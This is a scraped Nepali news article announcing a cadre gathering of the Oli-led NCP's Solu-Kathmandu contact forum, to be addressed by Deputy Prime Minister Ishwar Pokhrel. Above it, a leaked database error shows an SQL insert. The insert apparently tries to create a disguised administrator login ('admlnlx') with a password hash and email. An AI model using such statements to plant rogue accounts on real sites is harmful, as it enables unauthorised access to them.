WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2Leze6FxXuF1TpW/VKjRefLLfWv91.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 09:48:24', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । नेपाल कम्युनिस्ट पार्टी नेकपा (ओली समूह) सोलु-काठमाडौ सम्पर्क मञ्चले राजधानीमा भोलि मंगलबार बृहत कार्यकर्ता भेला गर्ने भएको छ । उक्त भेलामा सोलु-काठमाण्डौ संपर्क मञ्च पुनर्गठन गर्ने तयारी रहेको श्रोतले जनाएकोछ ।
सोलु-काठमाण्डौ संपर्क मन्चको भेलाई उपप्रधानमन्त्री ईश्वर पोखरेलले सम्बोधन गर्ने कार्यक्रम रहेको आयोजकले जनाएको छ । भेलामा प्रदेश नं १ सम्पर्क समन्वय कमिटीका इन्चार्ज किशोर अधिकारी, प्रदेश सम्पर्क समन्वय कमिटीका अध्यक्ष इन्द्र भण्डारीको पनि उपस्तिथी रहेने आयोजकले जनाएको छ ।
प्रतिनिधिसभा विघटनपछि प्रधानमन्त्री केपी शर्मा ओली नेतृत्वको नेकपा सोलुखुम्बुले राजधानीमा आयोजना गर्न लागेको यो पहिलो भेला हो । जिल्लामा भने गृहमन्त्री रामबहादुर थापा बादलको प्रमुख आतिथ्यमा गत माघ ५ गते अगुवा कार्यकर्ता भेला आयोजना गरिएको थियो।
जिल्ला कमिटीका प्रस्तावित अध्यक्ष र सचिवसहित केन्द्रीय सदस्य, प्रदेश कमिटी सदस्य र जिल्ला कमिटीका अन्य नेताहरुसमेत भेलामा सहभागी हुने सम्पर्क मन्चका अध्यक्ष अर्जुन कार्कीले जानकारी दिए।
उनले भोलि ११ बजेबाट सुरु हुने सो कार्यक्रममा सहभागी हुन पार्टी सम्बद्ध सबैजनालाइ अपिल समेत गरेका छन ।